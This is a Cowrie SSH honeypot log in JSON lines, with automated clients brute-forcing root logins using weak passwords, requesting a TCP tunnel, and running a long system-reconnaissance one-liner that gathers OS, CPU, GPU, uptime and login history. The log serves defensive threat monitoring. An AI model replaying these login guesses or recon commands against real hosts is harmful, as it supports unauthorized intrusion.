{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T17:39:43.479633Z","src_ip":"212.227.235.229","session":"f65ee0bdf461"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:39:44.030548Z","src_ip":"212.227.235.229","session":"f65ee0bdf461"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T17:39:44.169846Z","session":"f65ee0bdf461"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":45934,"dst_ip":"1.2.3.4","dst_port":22,"session":"64af53972b60","protocol":"ssh","message":"New connection: 170.64.157.139:45934 (1.2.3.4:22) [session: 64af53972b60]","sensor":"my-vps","timestamp":"2025-09-08T17:40:24.458781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:40:24.459667Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:40:24.749045Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:40:25.951272Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:40:26.680928Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.681591Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.682077Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.683060Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.683941Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.684754Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.685492Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.686437Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.687036Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.687560Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.688007Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.688657Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.689304Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.986258Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.987391Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:40:26.988192Z","src_ip":"170.64.157.139","session":"64af53972b60"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:40:53.343481Z","src_ip":"212.227.235.229","session":"f65ee0bdf461"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":35322,"dst_ip":"1.2.3.4","dst_port":22,"session":"15d355b4c442","protocol":"ssh","message":"New connection: 170.64.157.139:35322 (1.2.3.4:22) [session: 15d355b4c442]","sensor":"my-vps","timestamp":"2025-09-08T17:41:39.543176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:41:39.596457Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:41:39.883983Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.login.success","username":"root","password":"321","message":"login attempt [root/321] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.248481Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:41:41.947573Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.948305Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.948976Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.949972Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.951432Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.952290Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.953218Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.954224Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.954771Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.955288Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.955773Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.956413Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T17:41:41.956961Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T17:41:42.352770Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:41:42.353649Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:41:42.354518Z","src_ip":"170.64.157.139","session":"15d355b4c442"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":49138,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bd4385704b9","protocol":"ssh","message":"New connection: 170.64.157.139:49138 (1.2.3.4:22) [session: 6bd4385704b9]","sensor":"my-vps","timestamp":"2025-09-08T17:42:54.295979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:42:54.296738Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T17:42:54.635737Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.login.success","username":"root","password":"pass","message":"login attempt [root/pass] succeeded","sensor":"my-vps","timestamp":"2025-09-08T17:42:55.470109Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T17:42:56.079851Z","src_ip":"170.64.157.139","session":"6bd4385704b9"}
